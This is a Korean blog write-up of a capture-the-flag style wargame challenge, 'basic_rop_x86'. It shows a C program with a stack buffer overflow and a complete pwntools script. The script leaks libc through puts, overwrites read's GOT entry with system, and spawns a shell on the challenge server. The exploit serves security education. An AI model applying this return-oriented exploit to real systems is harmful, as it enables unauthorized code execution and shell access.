CIDY
[System_Hacking] stage7_문제풀이(basic_rop_x86) 본문
//32-bit, nx, partial relro
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void alarm_handler() {
puts("TIME OUT");
exit(-1);
}
void initialize() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
signal(SIGALRM, alarm_handler);
alarm(30);
}
int main(int argc, char *argv[]) {
char buf[0x40] = {};
initialize();
read(0, buf, 0x400);
write(1, buf, sizeof(buf));
return 0;
}흠 x64랑 너무 똑같은데?
얘도 다양한 풀이법이 떠오르지만...이번에는 그냥 bss에 적어보겠다. 그때그때 그냥 하고싶은대로 풀거임ㅋㅋ
from pwn import *
p = remote("host3.dreamhack.games", 18631)
e = ELF("./basic_rop_x86")
libc = ELF("./libc.so.6")
pop_ebx = 0x080483d9
pop3_ret = 0x08048689
bss = 0x804a040 + 0x500
pay = b"A" * 0x44
pay += b"B" *0x4
pay += p32(e.plt['puts'])
pay += p32(pop_ebx)
pay += p32(e.got['read'])
pay += p32(e.plt['read'])
pay += p32(pop3_ret)
pay += p32(0)
pay += p32(bss)
pay += p32(8)
pay += p32(e.plt['read'])
pay += p32(pop3_ret)
pay += p32(0)
pay += p32(e.got['read'])
pay += p32(4)
pay += p32(e.plt['read'])
pay += b"A" * 0x4
pay += p32(bss)
p.send(pay)
read = u32(p.recvuntil(b"\xf7")[-4:])
libc_base = read - libc.symbols['read']
print(hex(libc_base))
system = libc_base + libc.symbols['system']
p.send(b"/bin/sh\x00")
p.send(p32(system))
p.interactive()
딱히 설명할 포인트는 없음
'Hack > DreamHack(로드맵)' 카테고리의 다른 글
| [System_Hacking] stage8_문제풀이(fho) (0) | 2022.07.03 |
|---|---|
| [System_Hacking] stage8_Hook Overwrite (0) | 2022.07.03 |
| [System_Hacking] stage7_문제풀이(basic_rop_x64) (0) | 2022.07.02 |
| [System_Hacking] stage7_문제풀이(Return Oriented Programming) (0) | 2022.07.02 |
| [System_Hacking] stage7_문제풀이(Return to Library) (0) | 2022.07.02 |
'Hack/DreamHack(로드맵)' Related Articles
more
